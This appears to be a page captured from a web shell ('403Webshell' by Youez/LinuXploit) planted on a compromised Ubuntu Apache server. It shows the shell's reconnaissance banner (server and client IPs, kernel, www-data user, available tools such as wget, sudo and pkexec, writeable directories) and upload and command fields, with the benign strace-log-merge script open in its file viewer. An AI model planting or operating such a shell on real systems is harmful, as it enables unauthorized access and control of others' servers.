403Webshell
Server IP : 3.128.248.115  /  Your IP : 3.144.115.125
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux ip-172-31-33-233 5.15.0-1037-aws #41~20.04.1-Ubuntu SMP Mon May 22 18:18:00 UTC 2023 x86_64
User : www-data ( 33)
PHP Version : 7.4.28
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /bin/strace-log-merge
#!/bin/sh
#
# This script processes strace -ff -tt output.  It merges the contents of all
# STRACE_LOG.PID files and sorts them, printing result on the standard output.
#
# Copyright (c) 2012-2019 The strace developers.
#
# SPDX-License-Identifier: LGPL-2.1-or-later

show_usage()
{
	cat <<__EOF__
Usage: ${0##*/} STRACE_LOG

Finds all STRACE_LOG.PID files, adds PID prefix to every line,
then combines and sorts them, and prints result to standard output.

It is assumed that STRACE_LOGs were produced by strace with -tt[t]
option which prints timestamps (otherwise sorting won't do any good).
__EOF__
}

dd='\([0-9][0-9]\)'
ds='\([0-9][0-9]*\)'

if [ $# -ne 1 ]; then
	show_usage >&2
	exit 1
elif [ "$1" = '--help' ]; then
	show_usage
	exit 0
fi

logfile=$1

iterate_logfiles()
{
	local file suffix

	for file in "$logfile".*; do
		[ -f "$file" ] || continue
		suffix=${file#"$logfile".}
		[ "$suffix" -gt 0 ] 2> /dev/null ||
			continue
		"$@" "$suffix" "$file"
	done
}

max_suffix_length=0
process_suffix()
{
	local suffix len
	suffix="$1"; shift

	len=${#suffix}
	if [ $len -gt $max_suffix_length ]; then
		max_suffix_length=$len
	fi
}

process_logfile()
{
	local suffix file pid
	suffix="$1"; shift
	file="$1"; shift

	pid=$(printf "%-*s" $max_suffix_length $suffix)
	# Some strace logs have last line which is not '\n' terminated,
	# so add extra newline to every file.
	# Empty lines are removed later.
	sed -n "s/^\($dd:\)\?\($dd:\)\?\($ds\.\)\?$ds /\2\4\6\7 $pid \0/p" < "$file"
	echo
}

iterate_logfiles process_suffix

[ $max_suffix_length -gt 0 ] || {
	echo >&2 "${0##*/}: $logfile: strace output not found"
	exit 1
}

iterate_logfiles process_logfile |
	sort -s -n -k1,1 |
	sed -n 's/^[0-9][0-9]* //p' |
	grep -v '^$'

rc=$?
[ $rc -eq 1 ] &&
	echo >&2 "${0##*/}: $logfile: strace output not found"
exit $rc

Youez - 2016 - github.com/yon3zu
LinuXploit